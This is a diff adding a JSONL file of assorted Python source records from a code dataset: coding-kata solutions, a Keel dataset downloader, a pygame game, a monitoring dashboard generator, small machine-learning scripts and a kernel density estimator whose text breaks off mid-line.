diff --git "a/169.jsonl" "b/169.jsonl" new file mode 100644--- /dev/null +++ "b/169.jsonl" @@ -0,0 +1,695 @@ +{"seq_id":"637884083","text":"class Solution:\n def findRepeatedDnaSequences(self, s: str) -> List[str]:\n if not s or len(s) < 10:\n return []\n hash_map = {}\n res = []\n for i in range(10, len(s)+1):\n tmp = s[i-10:i]\n if tmp in hash_map and hash_map[tmp] == 1:\n res.append(tmp)\n hash_map[tmp] = hash_map.get(tmp, 0) + 1\n return res","sub_path":"187_重复的DNA序列.py","file_name":"187_重复的DNA序列.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421245403","text":"import math\nimport time\n\nstart = time.perf_counter()\n\nPrev2 = 0\nPrev = 1\nFin = 1\nTotal = 0\nwhile Fin <= 4e6:\n Fin = Prev2 + Prev\n Prev2 = Prev\n Prev = Fin\n if Fin/2 == math.floor(Fin/2):\n Total += Fin\n\nprint(Total)\n\nstop = time.perf_counter()\nsec = f\"{time} Seconds\"\nprint(stop-start)\n","sub_path":"Project Euler/Python/Euler2.py","file_name":"Euler2.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"258220877","text":"'''In this simple Kata your task is to create a function that turns a string into a Mexican Wave. \nYou will be passed a string and you must return that string in an array where an uppercase letter is a person standing up.\n\n1. The input string will always be lower case but maybe empty.\n2. If the character in the string is whitespace then pass over it as if it was an empty seat.'''\n\n\ndef wave(input):\n Upper=input.upper()\n array = []\n i = 0\n while i < len(input):\n if input[i] != \" \":\n first = input[0:i]\n last = input[i+1:(len(input))]\n array.append(first + Upper[i] + last)\n i+=1\n \n # Miki no me odies :D \n \n return array\n\n\nif __name__ == \"__main__\":\n \n\n # TEST CASES #\n\n\n \n result = [\"Hello\", \"hEllo\", \"heLlo\", \"helLo\", \"hellO\"]\n assert wave(\"hello\") == result\n\n result2 = [\"Codewars\", \"cOdewars\", \"coDewars\", \"codEwars\", \"codeWars\", \"codewArs\", \"codewaRs\", \"codewarS\"]\n assert wave(\"codewars\") == result2\n\n result3 = []\n assert wave(\"\") == result3\n\n result4 = [\"Two words\", \"tWo words\", \"twO words\", \"two Words\", \"two wOrds\", \"two woRds\", \"two worDs\", \"two wordS\"]\n assert wave(\"two words\") == result4\n\n result5 = [\" Gap \", \" gAp \", \" gaP \"]\n assert wave(\" gap \") == result5\n","sub_path":"Python_katas/katas_6kyu/mexican_wave.py","file_name":"mexican_wave.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333115109","text":"\"\"\"\nKeel datasets (http://sci2s.ugr.es/keel).\n\n@author: David Diaz Vico\n@license: MIT\n\"\"\"\n\nimport io\nimport numpy as np\nimport os\nimport pandas as pd\nfrom sklearn.datasets import get_data_home\nfrom sklearn.utils import Bunch\nfrom sklearn.model_selection import check_cv\nfrom sklearn.preprocessing import LabelEncoder, OrdinalEncoder\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\n\nBASE_URL = 'http://sci2s.ugr.es/keel'\nCOLLECTIONS = {'classification', 'missing', 'imbalanced', 'multiInstance',\n 'multilabel', 'textClassification', 'classNoise',\n 'attributeNoise', 'semisupervised', 'regression', 'timeseries',\n 'unsupervised', 'lowQuality'}\n\n\n# WTFs\nIMBALANCED_URLS = ['keel-dataset/datasets/imbalanced/imb_IRhigherThan9',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p1',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p2',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p3',\n 'dataset/data/imbalanced',\n 'keel-dataset/datasets/imbalanced/imb_noisyBordExamples',\n 'keel-dataset/datasets/imbalanced/preprocessed']\nIRREGULAR_DESCR_IMBALANCED_URLS = ['keel-dataset/datasets/imbalanced/imb_IRhigherThan9',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p1',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p2',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p3']\nINCORRECT_DESCR_IMBALANCED_URLS = {'semisupervised': 'classification'}\n\n\ndef _load_Xy(zipfile, csvfile, sep=',', header=None, engine='python',\n na_values={'?'}, **kwargs):\n \"\"\"Load a zippend csv file with targets in the last column and features in\n the rest.\"\"\"\n with ZipFile(zipfile) as z:\n with z.open(csvfile) as c:\n s = io.StringIO(c.read().decode(encoding=\"utf8\"))\n data = pd.read_csv(s, sep=sep, header=header, engine=engine,\n na_values=na_values, **kwargs)\n X = pd.get_dummies(data.iloc[:, :-1])\n y = pd.factorize(data.iloc[:, -1].tolist(), sort=True)[0]\n return X, y\n\n\ndef _load_descr(collection, name, dirname=None):\n \"\"\"Load a dataset description.\"\"\"\n filename = name + '-names.txt'\n if collection == 'imbalanced':\n for url in IMBALANCED_URLS:\n if url in IRREGULAR_DESCR_IMBALANCED_URLS:\n url = BASE_URL + '/' + url + '/' + 'names' + '/' + filename\n else:\n url = BASE_URL + '/' + url + '/' + filename\n try:\n f = filename if dirname is None else os.path.join(dirname,\n filename)\n f, _ = urlretrieve(url, filename=f)\n break\n except:\n continue\n else:\n collection = INCORRECT_DESCR_IMBALANCED_URLS[collection] if collection in INCORRECT_DESCR_IMBALANCED_URLS else collection\n url = BASE_URL + '/' + 'dataset/data' + '/' + collection + '/' + filename\n f = filename if dirname is None else os.path.join(dirname, filename)\n f, _ = urlretrieve(url, filename=f)\n with open(f) as rst_file:\n fdescr = rst_file.read()\n nattrs = fdescr.count(\"@attribute\")\n return nattrs, fdescr\n\n\ndef _fetch_keel_zip(collection, filename, dirname=None):\n \"\"\"Fetch Keel dataset zip file.\"\"\"\n if collection == 'imbalanced':\n for url in IMBALANCED_URLS:\n url = BASE_URL + '/' + url + '/' + filename\n try:\n f = filename if dirname is None else os.path.join(dirname,\n filename)\n f, _ = urlretrieve(url, filename=f)\n break\n except:\n continue\n else:\n url = BASE_URL + '/' + 'dataset/data' + '/' + collection + '/' + filename\n f = filename if dirname is None else os.path.join(dirname, filename)\n f, _ = urlretrieve(url, filename=f)\n return f\n\n\ndef _load_folds(collection, name, nfolds, dobscv, nattrs, dirname=None):\n \"\"\"Load a dataset folds.\"\"\"\n filename = name + '.zip'\n f = _fetch_keel_zip(collection, filename, dirname=dirname)\n X, y = _load_Xy(f, name + '.dat', skiprows=nattrs + 4)\n cv = None\n if nfolds in (5, 10):\n fold = 'dobscv' if dobscv else 'fold'\n filename = name + '-' + str(nfolds) + '-' + fold + '.zip'\n f = _fetch_keel_zip(collection, filename, dirname=dirname)\n Xs = []\n ys = []\n Xs_test = []\n ys_test = []\n for i in range(nfolds):\n if dobscv:\n _name = os.path.join(name, name + '-' + str(nfolds) + 'dobscv-' + str(i + 1))\n else:\n _name = name + '-' + str(nfolds) + '-' + str(i + 1)\n _X, _y = _load_Xy(f, _name + 'tra.dat', skiprows=nattrs + 4)\n _X_test, _y_test = _load_Xy(f, _name + 'tst.dat',\n skiprows=nattrs + 4)\n Xs.append(_X)\n ys.append(_y)\n Xs_test.append(_X_test)\n ys_test.append(_y_test)\n cv = zip(Xs, ys, Xs_test, ys_test)\n return X, y, cv\n\n\ndef fetch(collection, name, data_home=None, nfolds=None, dobscv=False):\n \"\"\"Fetch Keel dataset.\n\n Fetch a Keel dataset by collection and name. More info at\n http://sci2s.ugr.es/keel.\n\n Parameters\n ----------\n collection : string\n Collection name.\n name : string\n Dataset name.\n data_home : string or None, default None\n Specify another download and cache folder for the data sets. By default\n all scikit-learn data is stored in ‘~/scikit_learn_data’ subfolders.\n nfolds : int, default=None\n Number of folds. Depending on the dataset, valid values are\n {None, 1, 5, 10}.\n dobscv : bool, default=False\n If folds are in {5, 10}, indicates that the cv folds are distribution\n optimally balanced stratified. Only available for some datasets.\n **kwargs : dict\n Optional key-value arguments\n\n Returns\n -------\n data : Bunch\n Dictionary-like object with all the data and metadata.\n\n \"\"\"\n if collection not in COLLECTIONS:\n raise Exception('Avaliable collections are ' + str(list(COLLECTIONS)))\n dirname = os.path.join(get_data_home(data_home=data_home), 'keel',\n collection, name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n nattrs, DESCR = _load_descr(collection, name, dirname=dirname)\n X, y, cv = _load_folds(collection, name, nfolds, dobscv, nattrs,\n dirname=dirname)\n data = Bunch(data=X, target=y, data_test=None, target_test=None,\n inner_cv=None, outer_cv=cv, DESCR=DESCR)\n return data\n","sub_path":"skdatasets/repositories/keel.py","file_name":"keel.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551886421","text":"import pygame\nimport time\nimport sys\nimport numpy\n\nfrom gamestate import *\nfrom container import *\nfrom entity import *\nfrom player import *\nfrom simpleplatformlevel import *\n\nwindowSize = (800, 600)\nbackgroundColor = 128, 128, 128\n\nrunning = True\ngameState = GameState(windowSize)\n\ndef userQuit():\n\tglobal running\n\trunning = False\n\ndef handleSpecialKeys(key):\n\tif key == pygame.K_ESCAPE:\n\t\tuserQuit()\n\telif key == pygame.K_F4:\n\t\tuserQuit()\n\ndef handleKeyUp(key):\n\thandleSpecialKeys(key)\n\tgameState.handleKeyUp(key)\n\ndef handleEvents():\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tuserQuit()\n\t\tif event.type == pygame.KEYUP:\n\t\t\thandleKeyUp(event.key)\n\ndef drawHud(screen):\n\t# font = pygame.font.SysFont('Arial', 25)\n\t# textColor = (255, 255, 255)\n\t# position = (200, 100)\n\t# if gameState.player is not None:\n\t\t# text = 'Stamina: ' + str(int(gameState.player.stamina))\n\t# else:\n\t\t# text = ''\n\t# screen.blit(font.render(text, True, textColor), position)\n\tif gameState.player is not None:\n\t\tdisplayHealth(screen, gameState.player)\n\t\tdisplayStamina(screen, gameState.player)\n\ndef displayHealth(screen, player):\n\ttextColor = (255, 255, 255)\n\tposition = (200, 75)\n\ttext = 'Health: ' + str(int(player.health))\n\tdisplayText(screen, text, textColor, position)\n\ndef displayStamina(screen, player):\n\ttextColor = (255, 255, 255)\n\tposition = (200, 100)\n\ttext = 'Stamina: ' + str(int(player.stamina))\n\tdisplayText(screen, text, textColor, position)\n\ndef displayText(screen, text, textColor, position):\n\tfont = pygame.font.SysFont('Arial', 25)\n\tscreen.blit(font.render(text, True, textColor), position)\n\ndef drawGame(screen):\n\tscreen.fill(backgroundColor)\n\tgameState.draw(screen)\n\tdrawHud(screen)\n\tpygame.display.flip()\n\ndef gameLoop(screen):\n\twhile running:\n\t\thandleEvents()\n\t\tgameState.update()\n\t\tdrawGame(screen)\n\tsys.exit()\n\ndef initDisplay():\n\tpygame.init()\n\tscreen = pygame.display.set_mode(windowSize)\n\tpygame.display.set_caption(\"Sky Tower\")\n\treturn screen\n\ndef initGame():\n\tgameState.addPlayer(Player(50, -60, 20, 60))\n\tgenerateLevel()\n\ndef generateLevel():\n\tgenerator = SimplePlatformLevel();\n\tgenerator.generateLevel(gameState);\n\ndef hardcodedLevel():\n\tother = Entity(200, -150, 50, 25)\n\tother.gravity = False\n\tother.collisionType = physics.CollisionType.COLLIDEABLE_OBSTACLE\n\tgameState.addEntity(other)\n\tother = Entity(400, -150, 200, 25)\n\tother.gravity = False\n\tother.collisionType = physics.CollisionType.COLLIDEABLE_OBSTACLE\n\tgameState.addEntity(other)\n\ndef startGame():\n\tscreen = initDisplay()\n\tinitGame()\n\tgameLoop(screen)\n\nif __name__ == \"__main__\":\n\tstartGame()\n","sub_path":"skytower/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"652866247","text":"#!/usr/bin/python\ndef main():\n\tprint(\"this is the functions.py file \")\n\tfor i in inclusive_range():\n\t\tprint(i)\n\ndef inclusive_range(*args):\n\tnumargs = len(args)\n\tif numargs < 1: raise TypeError('required atleast one argument')\n\telif numargs == 1:\n\t\tstop = args[0]\n\t\tstart = 0\n\t\tstep = 1\n\telif numargs == 2:\n\t\t(start, stop) = args\n\t\tstep = 1\n\telif numargs == 3:\n\t\t(start, stop, step) = args\n\telse: raise TypeError('inclusive_range expected atmost 3 arguments, got {}'.format(numargs))\n\ti = start\n\twhile i <= stop:\n\t\tyield i\n\t\ti += step\nif __name__ == \"__main__\": main()\n","sub_path":"python/code-4/funcyieldargs.py","file_name":"funcyieldargs.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584571069","text":"#johanc\nimport pygame\nfrom pygame.sprite import Sprite\nclass Ship(Sprite):\n\n def __init__(self, ai_settings, screen):\n super(Ship,self).__init__()\n '''Initializes the ship and sets its origin'''\n self.screen = screen\n self.ai_settings = ai_settings\n #load ship\n self.image = pygame.image.load('res/ship.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n #ship at the bottom\n self.rect.centerx = self.screen_rect.centerx\n self.rect.bottom = self.screen_rect.bottom\n #decimal value of ship's center\n self.center = float(self.rect.centerx)\n #Movement flag\n self.moving_right = False\n self.moving_left = False\n\n def center_ship(self):\n '''Centers ship'''\n self.center = self.screen_rect.centerx\n\n def update(self):\n '''Update position based on flag'''\n if self.moving_right and self.rect.right < self.screen_rect.right: #Makes sure it doesn't go off screen\n self.center += self.ai_settings.ship_speed_multiplier\n if self.moving_left and self.rect.left > 0:\n self.center -= self.ai_settings.ship_speed_multiplier\n self.rect.centerx = self.center\n\n def blitme(self):\n '''Draw ship'''\n self.screen.blit(self.image,self.rect)","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46593868","text":"import time\n\ndef plot_data(recent_logs):\n\t\"\"\"returns radar_data and line_data to be used for plotting radar and time series plots\"\"\"\n\n\tradar_data = dict()\n\tline_data = dict()\n\n\tradar_data['CPU_TEMP'] = 0\n\tradar_data['EMAIL'] = 0\n\tradar_data['GPU_TEMP'] = 0\n\tradar_data['PING'] = 0\n\tradar_data['SERVICE'] = 0\n\tradar_data['SMS'] = 0\n\tradar_data['UPS'] = 0\n\tradar_data['DC_ENV_CI_TEMP'] = 0\n\tradar_data['DC_ENV_CI_HUM'] = 0\n\tradar_data['DC_ENV_HI_TEMP'] = 0\n\tradar_data['DC_ENV_HI_HUM'] = 0\n\n\tfor log_i in recent_logs:\n\t\t# collect data for radar plot\n\t\tif (log_i[4].startswith('PING ')):\n\t\t\tif (radar_data['PING'] < int(log_i[3])):\n\t\t\t\tradar_data['PING'] = int(log_i[3])\n\t\telif (log_i[4].startswith('CPU_TEMP ')):\n\t\t\tif (radar_data['CPU_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['CPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('GPU_TEMP ')):\n\t\t\tif (radar_data['GPU_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['GPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SERVICE ')):\n\t\t\tif (radar_data['SERVICE'] < int(log_i[3])):\n\t\t\t\tradar_data['SERVICE'] = int(log_i[3])\n\t\telif (log_i[4].startswith('UPS ')):\n\t\t\tif (radar_data['UPS'] < int(log_i[3])):\n\t\t\t\tradar_data['UPS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SMS ')):\n\t\t\tif (radar_data['SMS'] < int(log_i[3])):\n\t\t\t\tradar_data['SMS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('EMAIL ')):\n\t\t\tif (radar_data['EMAIL'] < int(log_i[3])):\n\t\t\t\tradar_data['EMAIL'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_TEMP ')):\n\t\t\tif (radar_data['DC_ENV_CI_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_CI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_HUM ')):\n\t\t\tif (radar_data['DC_ENV_CI_HUM'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_CI_HUM'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_TEMP ')):\n\t\t\tif (radar_data['DC_ENV_HI_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_HI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_HUM ')):\n\t\t\tif (radar_data['DC_ENV_HI_HUM'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_HI_HUM'] = int(log_i[3])\n\n\t\t# collect data for time series plot\n\t\tuid = log_i[0]\n\t\tif (uid not in line_data.keys()):\n\t\t\tline_data[uid] = dict()\n\n\t\t\tline_data[uid]['PING'] = 0\n\t\t\tline_data[uid]['CPU_TEMP'] = 0\n\t\t\tline_data[uid]['GPU_TEMP'] = 0\n\t\t\tline_data[uid]['SERVICE'] = 0\n\t\t\tline_data[uid]['UPS'] = 0\n\t\t\tline_data[uid]['SMS'] = 0\n\t\t\tline_data[uid]['EMAIL'] = 0\n\t\t\tline_data[uid]['DC_ENV_CI_TEMP'] = 0\n\t\t\tline_data[uid]['DC_ENV_CI_HUM'] = 0\n\t\t\tline_data[uid]['DC_ENV_HI_TEMP'] = 0\n\t\t\tline_data[uid]['DC_ENV_HI_HUM'] = 0\n\n\t\tif (log_i[4].startswith('PING ')):\n\t\t\tif (line_data[uid]['PING'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['PING'] = int(log_i[3])\n\t\telif (log_i[4].startswith('CPU_TEMP ')):\n\t\t\tif (line_data[uid]['CPU_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['CPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('GPU_TEMP ')):\n\t\t\tif (line_data[uid]['GPU_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['GPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SERVICE ')):\n\t\t\tif (line_data[uid]['SERVICE'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['SERVICE'] = int(log_i[3])\n\t\telif (log_i[4].startswith('UPS ')):\n\t\t\tif (line_data[uid]['UPS'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['UPS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SMS ')):\n\t\t\tif (line_data[uid]['SMS'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['SMS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('EMAIL ')):\n\t\t\tif (line_data[uid]['EMAIL'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['EMAIL'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_TEMP ')):\n\t\t\tif (line_data[uid]['DC_ENV_CI_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_CI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_HUM ')):\n\t\t\tif (line_data[uid]['DC_ENV_CI_HUM'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_CI_HUM'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_TEMP ')):\n\t\t\tif (line_data[uid]['DC_ENV_HI_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_HI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_HUM ')):\n\t\t\tif (line_data[uid]['DC_ENV_HI_HUM'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_HI_HUM'] = int(log_i[3])\n\n\tmax_c = radar_data[max(radar_data, key = radar_data.get)]\n\n\treturn (radar_data, line_data, max_c)\n\ndef template_to_index(template_lines, radar_data, line_data, max_c):\n\t\"\"\"generates content for index.html\"\"\"\n\n\tindex_file = list()\n\tfor line in template_lines:\n\t\tif (line.endswith('CRIMSON_RADAR_1')):\n\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t{}, {}, {}, {}, {}, {}, {},{}, {}, {}, {},'.format(radar_data['PING'], \\\n\t\t\t\tradar_data['CPU_TEMP'], radar_data['GPU_TEMP'], radar_data['SERVICE'], \\\n\t\t\t\tradar_data['UPS'], radar_data['SMS'], radar_data['EMAIL'],\n\t\t\t\tradar_data['DC_ENV_CI_TEMP'], radar_data['DC_ENV_CI_HUM'],\n\t\t\t\tradar_data['DC_ENV_HI_TEMP'], radar_data['DC_ENV_HI_HUM'],)\n\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_PING')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['PING'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_CPU_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['CPU_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_GPU_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['GPU_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_SERVICE')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['SERVICE'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_UPS')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['UPS'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_SMS')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['SMS'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_EMAIL')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['EMAIL'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_CI_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['DC_ENV_CI_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_CI_HUM')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['DC_ENV_CI_HUM'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_HI_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['DC_ENV_HI_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_HI_HUM')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['DC_ENV_HI_HUM'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif ('CRIMSON_CRITICALITY' in line):\n\t\t\thtml_lines = line\n\t\t\thtml_lines = html_lines.replace('CRIMSON_CRITICALITY', str(max_c))\n\t\t\tindex_file.append(html_lines)\n\t\telse:\n\t\t\thtml_lines = line\n\t\t\tindex_file.append(html_lines)\n\n\treturn index_file\n\ndef other_files(recent_logs):\n\t\"\"\"generates content for complete.csv and abnormalities.html\"\"\"\n\n\ttable_head = \"\"\"\n\t\n\t\n\t\n\t\t
\n\t\t\n\t\"\"\"\n\n\ttable_tail = \"\"\"\n\t\t\t\n\t\t
\n\t\n\t\n\t\"\"\"\n\n\tcomplete_csv_file = list()\n\tabnormalities_html_file = list()\n\tabnormalities_html_file.append(table_head)\n\tfor log_i in recent_logs:\n\t\tc_line = '{},{},{},{},{},{}'.format(log_i[0], log_i[1], log_i[2], log_i[3], log_i[4], log_i[5])\n\t\tcomplete_csv_file.append(c_line)\n\n\t\tif (log_i[3] > 1):\n\t\t\tepoch_time = log_i[5]\n\t\t\tdisp_time = time.strftime('%Y-%b-%d %H:%M:%S', time.localtime(epoch_time))\n\n\t\t\tc1 = '\\t\\t'\n\t\t\tc2 = '\\t\\t\\t {} '.format(disp_time)\n\t\t\tc3 = '\\t\\t\\t {} '.format(log_i[1])\n\t\t\tc4 = '\\t\\t\\t {} '.format(log_i[3])\n\t\t\tc5 = '\\t\\t\\t {} '.format(log_i[4])\n\t\t\tc6 = '\\t\\t'\n\n\t\t\tabnormalities_html_file.append(c1)\n\t\t\tabnormalities_html_file.append(c2)\n\t\t\tabnormalities_html_file.append(c3)\n\t\t\tabnormalities_html_file.append(c4)\n\t\t\tabnormalities_html_file.append(c5)\n\t\t\tabnormalities_html_file.append(c6)\n\n\tabnormalities_html_file.append(table_tail)\n\n\treturn (complete_csv_file, abnormalities_html_file)\n\n","sub_path":"codes/crimson_cloud/modules/crimson_web.py","file_name":"crimson_web.py","file_ext":"py","file_size_in_byte":8868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448382296","text":"import glob\nfrom fpdf import FPDF\n\nimages = glob.glob(\"/Users/laurence/Desktop/rasters/lock_to_reward/*.png\")\npdf = FPDF()\n\n# imagelist is the list with all image filenames\nfor image in images:\n pdf.add_page()\n pdf.image(image,0,0,210,297)\npdf.output(\"reward_rasters.pdf\", \"F\")\n","sub_path":"data_visulisations/convert_to_PDF.py","file_name":"convert_to_PDF.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"414945636","text":"'''Um professor quer sortear um dos seus quatros alunos para apagar o quadro.\nFaça um programa que ajude ele, lendo o nome deles e escrevendo o nome do escolhido'''\nimport random\naluno1 = str(input(\"Qual o nome do aluno 1: \"))\naluno2 = str(input(\"Qual o nome do aluno 2: \"))\naluno3 = str(input(\"Qual o nome do aluno 3: \"))\naluno4 = str(input(\"Qual o nome do aluno 4: \"))\nlista = [aluno1, aluno2, aluno3, aluno4]\nescolhido = random.choice(lista)\nprint(\"O aluno escolhido foi {}\".format(escolhido))\n","sub_path":"ex019.py","file_name":"ex019.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"240194706","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.externals.six import StringIO \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import preprocessing\nfrom numpy import array\nfrom sklearn.model_selection import cross_val_predict\n\nrf = RandomForestRegressor(n_estimators=1000, random_state=42)\n\n\ndef init():\n features = pd.read_csv('weather_data.csv')\n features = pd.get_dummies(features)\n features.iloc[:, 5:].head(5)\n labels = np.array(features['precipm'])\n features = features.drop('minpressurem', axis=1)\n features = features.drop('maxpressurem', axis=1)\n features = features.drop('meandewptm', axis=1)\n features = features.drop('maxdewptm', axis=1)\n features = features.drop('mindewptm', axis=1)\n feature_list = list(features.columns)\n print(feature_list)\n features = np.array(features)\n train_features, test_features, train_labels, test_labels = train_test_split(features, labels, test_size = 0.30, random_state = 42)\n\n rf.fit(train_features, train_labels)\n # predict(test_features)\n\n\ndef predict(tup):\n predictions = rf.predict(tup)\n result = np.mean(predictions)\n new_res = (result / 24) * 10\n probability_of_no_rainfall = (new_res * 0.5)\n print(1 - probability_of_no_rainfall)\n return 1 - probability_of_no_rainfall\n\n\ninit()\n","sub_path":"Irrigation prediction/rain_predictor.py","file_name":"rain_predictor.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"211392252","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom smolaClass.genTestData import data\nfrom scipy.stats import truncnorm\n\n\nclass kernelDensityEstimator:\n\n def __init__(self, data=None, h=None, kernel=\"gauss\", truncLvl=5):\n self.data = data\n self.h = h\n self.kernel = kernel\n self.truncLvl = truncLvl\n np.seterr(all='raise')\n\n\n def applyKernel(self, x, h=None, data=None):\n n = len(data)\n arg = (x - data) / h\n if self.kernel==\"gauss\":\n exponent = -1/2*(arg)**2\n exp = np.zeros(np.shape(exponent))\n exp[exponent>-80] = 1/np.sqrt(2*np.pi)*np.exp(exponent[exponent>-80])\n y = 